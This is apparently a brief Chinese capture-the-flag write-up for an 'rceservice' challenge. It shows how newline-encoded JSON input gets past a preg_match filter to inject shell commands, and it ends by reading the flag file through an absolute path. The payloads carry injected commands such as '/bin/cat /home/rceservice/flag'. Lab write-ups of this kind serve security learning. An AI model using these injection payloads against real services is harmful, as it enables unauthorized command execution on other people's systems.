网上找到了这题的源码
1 |
|
https://xz.aliyun.com/t/5399
跑脚本
1 | import requests |
另一种方法
因为是prematch所以匹配的第一行 就利用换行去绕过提交json格式
1 | ?cmd={%0A"cmd": "ls /"%0A} |
**putenv(‘PATH=/home/rceservice/jail’)**已经修改了环境变量所以试着从这个路径找一下
1 | ?cmd={%0A"cmd": "ls /home/rceservice"%0A} |
果然flag在这 直接用绝对路径调用就可以调用flag
1 | ?cmd={%0A"cmd": "/bin/cat /home/rceservice/flag"%0A} |